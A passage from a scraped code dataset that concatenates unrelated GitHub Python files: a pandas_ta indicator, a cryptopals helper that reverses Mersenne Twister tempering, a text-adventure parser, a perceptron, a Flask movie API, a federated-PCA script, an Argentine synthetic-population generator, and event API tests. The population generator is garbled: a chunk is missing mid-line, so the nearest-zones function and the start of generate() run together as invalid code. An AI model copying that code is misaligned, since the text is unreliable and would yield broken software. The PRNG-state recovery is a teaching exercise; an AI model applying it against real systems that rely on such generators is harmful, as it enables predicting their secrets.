self.PackageContent.append(obj)\n","repo_name":"HardwareDesignWithPython/HDPython","sub_path":"HDPython/v_Package.py","file_name":"v_Package.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"36091444162","text":"# -*- coding: utf-8 -*-\nfrom pandas import Series\nfrom pandas_ta._typing import DictLike, Int\nfrom pandas_ta.maps import Imports\nfrom pandas_ta.utils import v_offset, v_pos_default, v_series, v_talib\n\n\ndef midpoint(\n    close: Series, length: Int = None, talib: bool = None,\n    offset: Int = None, **kwargs: DictLike\n) -> Series:\n    \"\"\"Midpoint\n\n    The Midpoint is the average of the rolling high and low of period length.\n\n    Args:\n        close (pd.Series): Series of 'close's\n        length (int): Its period. Default: 2\n        talib (bool): If TA Lib is installed and talib is True, returns\n            the TA Lib version. Default: True\n        offset (int): How many periods to offset the result. Default: 0\n\n    Kwargs:\n        fillna (value, optional): pd.DataFrame.fillna(value)\n        fill_method (value, optional): Type of fill method\n\n    Returns:\n        pd.Series: New feature generated.\n
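\n    Example (illustrative; plain integer index, pandas path via talib=False):\n        >>> import pandas as pd\n        >>> midpoint(pd.Series([1.0, 3.0, 2.0, 5.0]), talib=False).tolist()\n        [nan, 2.0, 2.5, 3.5]\n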
    \"\"\"\n    # Validate\n    length = v_pos_default(length, 2)\n    if \"min_periods\" in kwargs and kwargs[\"min_periods\"] is not None:\n        min_periods = int(kwargs[\"min_periods\"])\n    else:\n        min_periods = length\n    close = v_series(close, max(length, min_periods))\n\n    if close is None:\n        return\n\n    mode_tal = v_talib(talib)\n    offset = v_offset(offset)\n\n    # Calculate\n    if Imports[\"talib\"] and mode_tal:\n        from talib import MIDPOINT\n        midpoint = MIDPOINT(close, length)\n    else:\n        lowest = close.rolling(length, min_periods=min_periods).min()\n        highest = close.rolling(length, min_periods=min_periods).max()\n        midpoint = 0.5 * (lowest + highest)\n\n    # Offset\n    if offset != 0:\n        midpoint = midpoint.shift(offset)\n\n    # Fill\n    if \"fillna\" in kwargs:\n        midpoint.fillna(kwargs[\"fillna\"], inplace=True)\n    if \"fill_method\" in kwargs:\n        midpoint.fillna(method=kwargs[\"fill_method\"], inplace=True)\n\n    # Name and Category\n    midpoint.name = f\"MIDPOINT_{length}\"\n    midpoint.category = \"overlap\"\n\n    return midpoint\n","repo_name":"webclinic017/Project-Killer-Public","sub_path":"Data Aggregation Bot/LAYER_DO_NOT_PUSH/python/lib/python3.9/site-packages/pandas_ta/overlap/midpoint.py","file_name":"midpoint.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21611249296","text":"import logging\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\ndef get_MSB(value, nbit):\n    if nbit < 0:\n        return 0\n    return (value >> (31 - nbit)) & 1\n\ndef set_MSB(result, nbit, bit):\n    return result | (bit << (31 - nbit))\n\n# invert y ^= y >> shift by recovering the bits from the MSB downwards\ndef unshift_xor_right(value, shift):\n    r = 0\n    for nbit in xrange(32):\n        r = set_MSB(\n            result = r,\n            nbit = nbit,\n            bit = get_MSB(value, nbit) ^ get_MSB(r, nbit - shift)\n        )\n    return r\n\ndef get_LSB(value, nbit):\n    if nbit < 0:\n        return 0\n    return (value >> nbit) & 1\n\ndef set_LSB(result, nbit, bit):\n    return result | (bit << nbit)\n\n# invert y ^= (y << shift) & mask by recovering the bits from the LSB upwards\ndef unshift_xor_left_mask(value, shift, mask):\n    r = 0\n    for nbit in xrange(32):\n        r = set_LSB(\n            result = r,\n            nbit = nbit,\n            bit = get_LSB(value, nbit) ^ (get_LSB(r, nbit - shift) & get_LSB(mask, nbit))\n        )\n    return r\n\n
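# MT19937 tempering applies, in order:\n#   y ^= y >> 11;  y ^= (y << 7) & 0x9d2c5680;  y ^= (y << 15) & 0xefc60000;  y ^= y >> 18\n# reverse_mersenne() undoes those four steps in reverse order.\n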
def reverse_mersenne(value):\n    value = unshift_xor_right(value, 18)\n    value = unshift_xor_left_mask(value, 0xf, 0xefc60000)\n    value = unshift_xor_left_mask(value, 0x7, 0x9d2c5680)\n    value = unshift_xor_right(value, 0xb)\n    return value\n","repo_name":"nnewsom/cryptopals","sub_path":"python2/lib/challenge23.py","file_name":"challenge23.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"22639722464","text":"move = object()\nmove_directions = {'n','e','s','w','north','east','south','west'}\nmove_words = {'move','walk','go'}\ngive_words = {'give', 'feed', 'present'}\nuse_words = {'eat', 'use', 'wear'}\nfight_words = {'fight', 'kill', 'hit', 'attack'}\nprepositions = {'up', 'down', 'on', 'under', 'in', 'at', 'to'}\n\ndrop_words = {'drop'}\nlook_words = {'look', 'inspect', 'examine'}\ninventory_names = {'inventory', 'possessions', 'belongings', 'bag'}\n\ndef action_prompt(inventory):\n    \"\"\"Prompts for an action, splits it into words, and removes any prepositions.\n    \n    Movement actions are represented by the move token object in this module,\n    followed by a one-letter direction.\n    \"\"\"\n    action = []\n    while len(action) == 0:\n        action = input('> ').lower().split()\n    for prep in prepositions.intersection(action):\n        action.remove(prep)\n    if len(action) == 2 and (action[0] in look_words) and (action[1] in inventory_names):\n        print(\"You have:\")\n        for item, n in inventory.most_common():\n            print(item, '(%d)' % n)\n        return action_prompt(inventory)\n    if len(action) == 2 and (action[0] in move_words) and (action[1] in move_directions):\n        return (move, action[1][0])\n    return action\n\ntake_words = {'pick', 'take', 'get', 'collect'}\n","repo_name":"gistfoundation/adventuregame-pysheff","sub_path":"agps/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"71844032871","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\n\r\nfolder = r'C:\\\\Users\\\\User\\\\Desktop\\\\alpha'\r\nn = os.listdir(folder)  # list of the files in the folder (a format filter could be given, but here the folder only holds .png files)\r\n\r\nw = np.zeros(168).reshape(8, 7, 3)  # weights\r\n\r\n# training vectors for the neuron\r\nD = []\r\nfor i in n:\r\n    D.append(plt.imread(os.path.join(folder, i)))\r\n\r\n# ground-truth labels for the neuron\r\nY = np.array(\r\n    [0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1])  # 0 - vowel, 1 - consonant\r\nprint(Y)\r\nα = 0.2\r\nβ = -0.4\r\nσ = lambda x: 1 if x > 0 else 0\r\n\r\n\r\ndef f(x):\r\n    s = β + np.sum(x * w)\r\n\r\n    if σ(s) == 1:\r\n        print('Consonant')\r\n    else:\r\n        print('Vowel')\r\n    return σ(s)\r\n\r\n\r\ndef train():\r\n    global w\r\n    _w = w.copy()\r\n    for x, y in zip(D, Y):  # for every file (letter) and its ground-truth label\r\n        w += α * (y - f(x)) * x\r\n        print(w)\r\n    return (w != _w).any()\r\n\r\n\r\nwhile train():\r\n    print(w)\r\n\r\n###\r\n\r\nprint(f(plt.imread('E.png')))  # for convenience, the input signal is read from the directory.\r\n","repo_name":"PoturaevPetr/python-for-datascience","sub_path":"лабораторная №2.py","file_name":"лабораторная №2.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"14025543632","text":"from flask import Blueprint, current_app, jsonify, redirect, request, url_for\nfrom .models import Movie\nfrom .serializer import MovieSchema\n\nbp_movies = Blueprint(\"movies\", __name__)\n\n\n@bp_movies.route(\"/list\", methods=[\"GET\"])\ndef list():\n    result = Movie.query.all()\n    return MovieSchema(many=True).jsonify(result), 200\n\n\n@bp_movies.route(\"/details/<int:movie_id>\", methods=[\"GET\"])\ndef detail(movie_id):\n    ms = MovieSchema()\n    result = Movie.query.filter(Movie.id == movie_id).first()\n    if result:\n        return ms.jsonify(result), 200\n    response = {\"message\": f\"404 - ID {movie_id} not found\"}\n    return jsonify(response), 404\n\n\n@bp_movies.route(\"/create\", methods=[\"POST\"])\ndef create():\n    ms = MovieSchema()\n    movie = ms.load(request.json)\n    current_app.db.session.add(movie)\n    current_app.db.session.commit()\n    return ms.jsonify(movie), 201\n\n\n@bp_movies.route(\"/delete/<int:movie_id>\", methods=[\"DELETE\"])\ndef delete(movie_id):\n    remove_movie = Movie.query.filter(Movie.id == movie_id).delete()\n    current_app.db.session.commit()\n    if remove_movie:\n        response = {\"message\": f\"ID {movie_id} has been deleted\"}\n        return jsonify(response), 200\n    response = {\"message\": f\"404 - ID {movie_id} not found\"}\n    return jsonify(response), 404\n\n\n
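# e.g. a PUT to <blueprint prefix>/update/7 with a JSON body of Movie fields\n# (as defined by MovieSchema) answers 200 when id 7 exists and 404 otherwise.\n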
@bp_movies.route(\"/update/<int:movie_id>\", methods=[\"PUT\"])\ndef update(movie_id):\n    query = Movie.query.filter(Movie.id == movie_id).update(request.json)\n    current_app.db.session.commit()\n    if query:\n        response = {\"message\": f\"200 - ID {movie_id} updated\"}\n        return jsonify(response), 200\n    response = {\"message\": f\"404 - ID {movie_id} not found\"}\n    return jsonify(response), 404\n","repo_name":"dirijo/movie-recommendation","sub_path":"app/movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"38294892912","text":"### imports\nimport numpy as np\nfrom numpy.core.fromnumeric import size\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport sys\nimport os\nimport math\nimport time\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\nfrom io import BytesIO\nfrom v6_simpleNN_py.model import model\nfrom config_functions import get_datasets, get_config,get_full_dataset\nfrom comp_functions import average, scaffold\nfrom vantage6.client import Client\nfrom scipy.sparse.linalg import eigs\nfrom vantage6.tools.mock_client import ClientMockProtocol\n\ndatasets = get_datasets(\"MNIST_2class\", False, False)\n\n### connect to server\nclient = ClientMockProtocol(\n    datasets=datasets,\n    module=\"v6_fedPCA_py\"\n)\norganizations = client.get_organizations_in_my_collaboration()\norg_ids = [organization[\"id\"] for organization in organizations]\n\n\nnum_clients = 10\nPCA_dims = 100\n\nprint(\"requesting metadata\")\nmetadata_task = client.create_new_task(\n    input_ = {\n        'method' : 'get_metadata'\n    },\n    organization_ids=org_ids\n)\n\nres = np.array(client.get_results(task_id = metadata_task.get(\"id\")))\n#print(res)\n\nnum_cols = res[0][\"num_cols\"]\n\nlocal_means = np.zeros((num_clients, num_cols))\nlocal_vars = np.zeros((num_clients, num_cols))\ndataset_sizes = np.zeros(num_clients)\n\nfor i in range(num_clients):\n    local_means[i,:] = res[i][\"local_mean\"]\n    local_vars[i,:] = res[i][\"local_var\"]\n    dataset_sizes[i] = res[i][\"num_rows\"]\n# get some random vals for the covariance matrix\ncov_rand = np.random.rand(num_cols,num_cols)\nw,v = eigs(cov_rand, k = PCA_dims)\n\n
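# pool the per-client statistics into global estimates, weighting each client\n# by its local dataset size (use_sizes=True)\n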
global_mean = average(local_means, dataset_sizes, None, None, None, use_sizes=True, use_imbalances=False)\nglobal_var = average(local_vars, dataset_sizes, None, None, None, use_sizes=True, use_imbalances=False)\n\ncov_partial_task = client.post_task(\n    input_= {\n        \"method\" : \"calc_cov_mat\",\n        \"kwargs\" : {\n            \"global_mean\" : global_mean,\n            \"global_var\" : global_var,\n            \"rows_to_calc\" : 5,\n            \"iter_num\" : 0\n        }\n    },\n    organization_ids=org_ids,\n    )\n\ntask = client.create_new_task(\n    input_ = {\n        'method' : 'do_PCA',\n        'kwargs' : {\n            'eigenvecs' : v.real,\n            'global_mean' : global_mean,\n            'global_var' : global_var\n        }\n    },\n    organization_ids=org_ids\n)\n","repo_name":"swiergarst/fedPCA","sub_path":"fedPCA_researcher-local.py","file_name":"fedPCA_researcher-local.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"917073920","text":"#!/usr/bin/env python3\nimport pandas as pd\nimport random\nimport itertools\nimport functools\nfrom tqdm import tqdm\nimport geopandas as gpd\nfrom utils.utils import normalize_dpto_name, validate_dpto_indexes\nimport os\nimport re\nimport json\nimport numpy as np\nfrom collections import defaultdict\nimport struct\nfrom scipy.spatial import cKDTree\nimport math\n\nDATA_DIR = os.path.join('data', 'argentina')\nCENSO_HDF = os.path.join(DATA_DIR, 'censo-2010', 'censo.hdf5')\nPXLOC = os.path.join(DATA_DIR, 'datosgobar-densidad-poblacion', 'pais.geojson')\nSCHOOL_HDF = os.path.join(DATA_DIR, 'ministerio-educacion', 'matricula_y_secciones.hdf')\n\nclass Person:\n    def __init__(self, id, family, edad, sexo, escuela, trabajo):\n        self.id = id\n        self.family = family\n        self.edad = edad\n        self.sexo = sexo\n        self.escuela = escuela\n        self.trabajo = trabajo\n\n    def pack(self):\n        # big-endian: family uint32, age uint8, is-female bool, school uint32, work uint32\n        struct_format = '>IB?II'\n        return struct.pack(struct_format, self.family, int(self.edad), self.sexo == 'Mujer', self.escuela, self.trabajo)\n\nclass Family:\n    def __init__(self, id, zone, dpto, prov):\n        self.id = id\n        self.zone = zone\n        self.dpto = dpto\n        self.prov = prov\n\n    def pack(self):\n        # big-endian: zone uint16, department uint16, province uint16\n        struct_format = '>HHH'\n        return struct.pack(struct_format, self.zone, int(self.dpto), int(self.prov))\n\n\nclass Population:\n    def __init__(self):\n        self.people = []\n        self.families = []\n        self.nearest_zones = []\n        self.nearest_densities = []\n        self.geodata = None\n        self.dpto_map = {}\n        self.prov_map = {}\n\n    def get_dpto_id(self, name):\n        if name not in self.dpto_map:\n            self.dpto_map[name] = len(self.dpto_map)\n        return self.dpto_map[name]\n\n    def get_prov_id(self, name):\n        if name not in self.prov_map:\n            self.prov_map[name] = len(self.prov_map)\n        return self.prov_map[name]\n\n    def calculate_ids(self):\n        self.departments = [i[0] for i in sorted(self.dpto_map.items(), key=lambda i: i[1])]\n        self.provinces = [i[0] for i in sorted(self.prov_map.items(), key=lambda i: i[1])]\n\n    def to_dat(self, dat_file, json_file, geopackage_file):\n        with open(json_file, 'w') as fout:\n            json.dump({\n                'nearest_zones': self.nearest_zones,\n                'nearest_densities': self.nearest_densities,\n                'department_densities': self.department_densities,\n                'province_densities': self.province_densities,\n                'departments': self.departments,\n                'provinces': self.provinces,\n            }, fout)\n        self.geodata.to_file(geopackage_file, driver=\"GPKG\")\n        with open(dat_file, mode='wb') as fout:\n            fout.write(struct.pack(\">I\", len(self.families)))\n            for p in tqdm(self.families):\n                fout.write(p.pack())\n            fout.write(struct.pack(\">I\", len(self.people)))\n            for p in tqdm(self.people):\n                fout.write(p.pack())\n\n\nclass GenWithDistribution:\n    def __init__(self, desired_cols, row, mx=None):\n        self.cols = desired_cols\n        self.cum_weights = list(itertools.accumulate([int(row[c]) for c in desired_cols]))\n        self.precalc = []\n        self.cur_index = 0\n\n    @staticmethod\n    def _remove_first_point(col):\n        return col[col.find('.')+1:]\n\n    def get(self, k=1):\n        if self.cur_index+k > len(self.precalc):\n            next_size = max(2*k, max(100, 2*len(self.precalc)))\n            self.precalc = list(map(GenWithDistribution._remove_first_point,\n                random.choices(self.cols, cum_weights = self.cum_weights, k = next_size)))\n            self.cur_index = 0\n        self.cur_index += k\n        return self.precalc[self.cur_index - k: self.cur_index]\n\n
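# One shared counter hands out school ids, so every school (urban or rural,\n# in any zone) gets a globally unique id from the single instance created in generate().\n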
class SchoolIdGenerator:\n    def __init__(self):\n        self.cur_idx = 0\n\n    def get_school(self):\n        self.cur_idx += 1\n        return self.cur_idx\n\nclass AlumnSchoolIdGenerator:\n    def __init__(self, school_gen, mean):\n        self.school_gen = school_gen\n        try:\n            self.mean = int(round(mean))\n        except Exception:\n            self.mean = 100 # TODO: why do we get NaN here?\n        self.cur_capacity = -1\n        self.cur_size = 0\n        self.cur_idx = 0\n\n    def _gen_new_school(self):\n        self.cur_capacity = self.mean\n        self.cur_size = 0\n        self.cur_idx = self.school_gen.get_school()\n\n    def get_school(self):\n        if self.cur_size >= self.cur_capacity:\n            self._gen_new_school()\n        self.cur_size += 1\n        return self.cur_idx\n\n\ndef cross_cols(a, b):\n    return {c: [f'{c}.{c2}' for c2 in b] for c in a}\n\ndef nearests_zones(geodata, upper_bound=5000, max_nearests=1200, remove_self=True):\n    #https://www.eye4software.com/hydromagic/documentation/supported-map-grids/Argentina\n    geodata = geodata.to_crs(epsg=5349)\n    centroids = np.array(list(zip(geodata.geometry.centroid.x, geodata.geometry.centroid.y)))\n    btree = cKDTree(centroids)\n    dist, idx = btree.query(centroids, k=max_nearests, distance_upper_bound=upper_bound)\n    idxs = np.stack([dist, idx], axis=2)\n    if remove_self:\n        condition = lambda d: d>1e-9 and d=3, edad), escuela)\n    edad_cross_trabaja = cross_cols(filter(lambda e: int(e)>=14, edad), trabaja)\n    urbano_rurales = {}\n    tamanios_escuelas = {}\n    tamanios = {}\n    parentescos = {}\n    edades = {}\n    sexos = {}\n    escuelas = {}\n    trabajos = {}\n    if prov_id is not None:\n        geodata = geodata[geodata['prov_id'].astype(int)==prov_id]\n    geodata = geodata.sample(frac=frac)\n    geodata.sort_values(['prov_id', 'dpto_id'], inplace=True)\n    population.geodata = geodata\n\n    print(\"Calculating nearest zones...\")\n    population.nearest_zones = nearests_zones(geodata, 1000, 1200, remove_self=False)\n    areas = np.array(geodata['area'].astype(float))\n    poblaciones = np.array(geodata['poblacion'].astype(float))\n    population.nearest_densities = [sum(poblaciones[z] for z in zones)/sum(areas[z] for z in zones) for zones in population.nearest_zones]\n    school_zones = nearests_zones(geodata, 5000, 1200, remove_self=False)\n\n\n    print(\"Generating distributions by department...\")\n    for index, row in tqdm(census.iterrows(), total=len(census)):\n        tamanios_escuelas[row['area']] = {c:row[c] for c in tamanio_escuela}\n        tamanios[row['area']] = GenWithDistribution(tamanios_familia, row)\n        urbano_rurales[row['area']] = GenWithDistribution(urbano_rural, row)\n        parentescos[row['area']] = {k: GenWithDistribution(v, row) for k, v in tamanio_cross_parentescos.items()}\n        edades[row['area']] = {k: GenWithDistribution(v, row) for k, v in parentescos_cross_edad.items()}\n        sexos[row['area']] = {k: GenWithDistribution(v, row) for k, v in parentescos_cross_sexo.items()}\n        escuelas[row['area']] = {k: GenWithDistribution(v, row) for k, v in edad_cross_escuela.items()}\n        trabajos[row['area']] = {k: GenWithDistribution(v, row) for k, v in edad_cross_trabaja.items()}\n\n    print(\"Generating population...\")\n    school_gen = SchoolIdGenerator()\n    school_gen_urb = {}\n    school_gen_rural = {}\n    for zone_id,(_i, row) in enumerate(geodata.iterrows()):\n        school_gen_urb[zone_id] = AlumnSchoolIdGenerator(school_gen, tamanios_escuelas[row['dpto_id']]['Alumnos urbano'])\n        school_gen_rural[zone_id] = AlumnSchoolIdGenerator(school_gen, tamanios_escuelas[row['dpto_id']]['Alumnos rural'])\n\n    es_flia_urbana = []\n    expected_people = geodata['poblacion'].sum()\n    with tqdm(total=expected_people, unit=\"people\") as progress:\n        for zone_id, (_i, row) in enumerate(geodata.iterrows()):\n            rural_urbano_flias = urbano_rurales[row['dpto_id']].get(k = int(row['hogares']))\n            tamanios_flias = tamanios[row['dpto_id']].get(k = int(row['hogares']))\n            parentescos_d = parentescos[row['dpto_id']]\n            edades_d = edades[row['dpto_id']]\n            sexos_d = sexos[row['dpto_id']]\n            escuelas_d = escuelas[row['dpto_id']]\n            trabajos_d = trabajos[row['dpto_id']]\n            by_parentesco = defaultdict(list)\n            for tam_flia, urbano in zip(tamanios_flias, 
rural_urbano_flias):\n urbano = urbano=='Urbano'\n tam_flia_num = int(tam_flia.replace('8 o más', str(random.choices(range(8, 16))[0])))\n parentescos_flia = parentescos_d[tam_flia].get(k=tam_flia_num)\n family_id = len(population.families)\n es_flia_urbana.append(urbano)\n population.families.append(Family(family_id, zone_id, population.get_dpto_id(row['dpto_id']), population.get_prov_id(row['prov_id'])))\n for member in parentescos_flia:\n id = len(population.people)\n by_parentesco[member].append(id)\n population.people.append(Person(id, family_id, None, None, 0, False))\n progress.update()\n by_edad = defaultdict(list)\n for parentesco, people in by_parentesco.items():\n edades_par = edades_d[parentesco].get(len(people))\n sexo_par = sexos_d[parentesco].get(len(people))\n for p,edadv,sexov in zip(people, edades_par, sexo_par):\n population.people[p].edad = edadv\n population.people[p].sexo = sexov\n by_edad[edadv].append(p)\n for edadv, people in by_edad.items():\n if int(edadv)>=3:\n estudian = escuelas_d[edadv].get(len(people))\n for p,estudiav in zip(people, estudian):\n es_urbana = es_flia_urbana[population.people[p].family]\n if estudiav == 'Asiste':\n population.people[p].escuela = school_gen_urb[random.choice(school_zones[zone_id])].get_school() if es_urbana else school_gen_rural[random.choice(school_zones[zone_id])].get_school()\n else:\n population.people[p].escuela = 0\n if int(edadv)>=14:\n trabajan = trabajos_d[edadv].get(len(people))\n for p,trabajav in zip(people, trabajan):\n if trabajav == 'Ocupado':\n population.people[p].trabajo = 1 #TODO: add work enviroments\n else:\n population.people[p].trabajo = 0\n\n population.calculate_ids()\n\n geo_bydpto = geodata.groupby('dpto_id')[['poblacion', 'area']].sum().reset_index().set_index('dpto_id')\n geo_bydpto['density'] = geo_bydpto['poblacion']/geo_bydpto['area']\n population.department_densities = [geo_bydpto['density'][dpto] for dpto in population.departments]\n geo_byprov = geodata.groupby('prov_id')[['poblacion', 'area']].sum().reset_index().set_index('prov_id')\n geo_byprov['density'] = geo_byprov['poblacion']/geo_byprov['area']\n population.province_densities = [geo_byprov['density'][prov] for prov in population.provinces]\n return population\n\n\ndef main():\n generate(prov_id=66, frac=1.0).to_dat(os.path.join(DATA_DIR, 'fake_population_small.dat'), os.path.join(DATA_DIR, 'fake_population_small.json'), os.path.join(DATA_DIR, 'fake_population_small.gpkg'))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vmartinv/simulator-covid-19-argentina","sub_path":"gen_dbs/fake_population_generator.py","file_name":"fake_population_generator.py","file_ext":"py","file_size_in_byte":14908,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"19562109703","text":"import cv2\nfrom keras.preprocessing import image\nimport numpy as np\nimport os\nfrom zipfile import ZipFile\n\n\ndef read_path(folder_path, size):\n \"\"\"\n Convert all files in a folder to images. 
The return value is used in\n    \`model.predictions()\`.\n\n    The images are resized to 32x32 (the model input size) only for\n    use in \`model.predictions\`.\n    \"\"\"\n    images = []\n    for img in os.listdir(folder_path):\n        img = os.path.join(folder_path, img)\n        img = image.load_img(img, target_size=size)\n        img = image.img_to_array(img)\n        img = np.expand_dims(img, axis=0)\n        images.append(img)\n\n    images = np.vstack(images)\n\n    return images\n\n\ndef zip_path(path, files):\n    with ZipFile(path, 'w') as zip:\n        for file in files:\n            file = file.replace('jpg', 'png')\n            zip.write(file)\n\n\ndef rotate(path, image, orientation, save_path):\n    rotated_dict = {\n        '0': 270, # rotated_left\n        '1': 90, # rotated_right\n        '2': 0, # upright\n        '3': 180, # upside_down\n    }\n\n    img = cv2.imread(path + '/' + image)\n\n    (h, w) = img.shape[:2]\n    center = (w / 2, h / 2)\n    scale = 1.0\n\n    M = cv2.getRotationMatrix2D(center, rotated_dict.get(orientation), scale)\n    img = cv2.warpAffine(img, M, (h, w))\n\n    image = image.replace('jpg', 'png')\n    cv2.imwrite(save_path + '/' + image, img)\n\n    return img\n","repo_name":"naanadr/correct_orientation","sub_path":"utils/work_images.py","file_name":"work_images.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"14074754492","text":"from nose.tools import *\nfrom test_helper import AppTestCase\nimport json\nimport datetime\n\nclass ApiTest(AppTestCase):\n\n    def create_event(self, event_data):\n        for k in [\"id\", \"modified_date\", \"created_date\"]:\n            event_data.pop(k, None)\n\n        response = self.post_json(\"/events\", event_data)\n        event_data[\"id\"] = response.json[\"event\"][\"id\"]\n        return (event_data, response)\n\n    def create_sample_event(self):\n        event_json = self.read_file(\"./tests/sample_event.json\")\n        event_data = json.loads(event_json)\n        return self.create_event(event_data)\n\n    def create_sample_location(self, event_id):\n        location_json = self.read_file(\"./tests/sample_location.json\")\n        location_data = json.loads(location_json)\n        location_data[\"event_id\"] = event_id\n\n        for k in [\"id\", \"modified_date\", \"created_date\"]:\n            location_data.pop(k, None)\n\n        response = self.post_json(\"/locations\", location_data)\n        location_data[\"id\"] = response.json[\"location\"][\"id\"]\n        return (location_data, response)\n\n    def test_fetching_events(self):\n        response = self.client.get(\"/events\")\n        assert_equal(response.status_code, 200)\n        assert_equal([], response.json)\n\n    def test_creating_an_event(self):\n        event_data, response = self.create_sample_event()\n        assert_equal(response.status_code, 200)\n\n        event_id = response.json[\"event\"][\"id\"]\n        response = self.client.get(\"/events/%s\" % event_id)\n        assert_equal(response.status_code, 200)\n        assert_equal(event_data[\"name\"], response.json[\"name\"])\n\n        response = self.client.get(\"/events\")\n        assert_equal(1, len(response.json))\n\n    def test_fetching_locations(self):\n        response = self.client.get(\"/locations\")\n        assert_equal(response.status_code, 200)\n        assert_equal([], response.json)\n\n    def test_creating_a_location(self):\n\n        # Create an event for our location to point to\n        event_data, event_response = self.create_sample_event()\n\n        location_data, response = self.create_sample_location(event_response.json[\"event\"][\"id\"])\n\n        assert_equal(response.status_code, 200)\n        location_id = response.json[\"location\"][\"id\"]\n        response = self.client.get(\"/locations/%s\" % location_id)\n        assert_equal(response.status_code, 200)\n        
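# the created location should round-trip through the API unchanged\n        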
assert_equal(location_data[\"name\"], response.json[\"name\"])\n response = self.client.get(\"/locations\")\n assert_equal(1, len(response.json))\n\n def test_reading_event_attributes(self):\n self.create_sample_event()\n\n expected_attrs = [u\"name\", u\"start_date\", u\"end_date\",\n u\"description\", u\"status\", u\"id\", u\"location_info\", u\"attendee_info\"]\n\n event = self.client.get(\"/events\").json[0]\n assert_equal(sorted(expected_attrs), sorted(event.keys()))\n\n def test_reading_location_attributes(self):\n _, response = self.create_sample_event()\n self.create_sample_location(response.json[\"event\"][\"id\"])\n\n expected_attrs = [u\"id\", u\"name\", u\"contact_email\", u\"contact_phone\",\n u\"contact_family_name\", u\"contact_given_name\",\n u\"host_given_name\", u\"city\", u\"state\",\n u\"address1\", u\"address2\", u\"number_spaces_remaining\",\n u\"spaces_remaining\"]\n\n event = self.client.get(\"/locations\").json[0]\n assert_equal(sorted(expected_attrs), sorted(event.keys()))\n\n def test_event_includes_location_data_if_available(self):\n # Create an event for our location to point to\n event_data, event_response = self.create_sample_event()\n\n location_data, response = self.create_sample_location(event_response.json[\"event\"][\"id\"])\n response = self.client.get(\"/events\")\n event = response.json[0]\n\n assert_equal(location_data[\"name\"], event[\"location_info\"][\"name\"])\n\n def test_can_rsvp_for_an_event(self):\n event_data, event_response = self.create_sample_event()\n event_id = event_data[\"id\"]\n\n user_info = {\"name\": \"Horace\", \"email\": \"h@example.com\"}\n\n path = \"/events/%s/attendees\" % event_id\n response = self.post_json(path, user_info)\n\n assert_equal(response.status_code, 200)\n assert_equal([user_info], response.json)\n\n updated_event = self.client.get(\"/events/%s\" % event_id).json\n\n assert_equal([user_info], updated_event[\"attendee_info\"])\n\n\n def test_duplicate_rsvps_get_ignored(self):\n event_data, event_response = self.create_sample_event()\n event_id = event_data[\"id\"]\n\n user_info = {\"name\": \"Horace\", \"email\": \"h@example.com\"}\n\n path = \"/events/%s/attendees\" % event_id\n response = self.post_json(path, user_info)\n\n assert_equal(response.status_code, 200)\n assert_equal([user_info], response.json)\n\n response = self.post_json(path, user_info)\n assert_equal(response.status_code, 200)\n assert_equal([user_info], response.json)\n\n def test_removing_an_rsvp(self):\n event_data, event_response = self.create_sample_event()\n event_id = event_data[\"id\"]\n\n user_info = {\"name\": \"Horace\", \"email\": \"h@example.com\"}\n\n path = \"/events/%s/attendees\" % event_id\n response = self.delete_json(path, user_info)\n\n assert_equal(response.status_code, 200)\n assert_equal([], response.json)\n\n def test_returns_events_in_chronological_order_of_start_date(self):\n times = []\n for offset in [5,30,100]:\n times.append(datetime.datetime.now() + datetime.timedelta(hours=offset))\n\n # \"start_date\": \"2015-08-22 17:00:00\",\n serialized_times = []\n for t in times:\n serialized_times.append(t.strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n soonest, sooner, soon = serialized_times\n\n e1 = {\"start_date\": sooner}\n e2 = {\"start_date\": soonest}\n e3 = {\"start_date\": soon}\n\n for e in [e1,e2,e3]:\n self.create_event(e)\n\n all_events = self.client.get(\"/events\").json\n recv_times = []\n\n # have to convert them back to the matching format....\n for e in all_events:\n time = 
